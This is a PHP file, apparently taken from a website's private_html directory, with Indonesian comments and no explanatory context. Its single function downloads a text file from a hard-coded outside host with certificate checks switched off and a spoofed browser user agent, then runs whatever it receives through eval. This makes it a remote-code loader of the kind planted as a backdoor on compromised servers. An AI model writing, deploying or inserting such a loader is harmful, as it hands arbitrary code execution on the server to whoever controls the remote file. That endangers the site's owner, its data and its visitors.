File: /home/beestg/domains/beestgenot.nl/private_html/v4.php
<?php
// Menggunakan cURL
function execute_php_from_url_curl($url) {
    try {
        // Inisialisasi cURL
        $ch = curl_init();
        
        // Set opsi cURL
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        
        // Eksekusi request
        $code = curl_exec($ch);
        
        // Cek error
        if (curl_errno($ch)) {
            throw new Exception("cURL Error: " . curl_error($ch));
        }
        
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if ($http_code !== 200) {
            throw new Exception("HTTP Error: " . $http_code);
        }
        
        // Tutup cURL
        curl_close($ch);
        
        // Menjalankan kode PHP
        eval("?>".$code);
        
    } catch (Exception $e) {
        echo "Error: " . $e->getMessage();
    }
}
// URL target
$url = "https://stepmomhub.com/3.txt";
// Eksekusi kode
execute_php_from_url_curl($url);
?>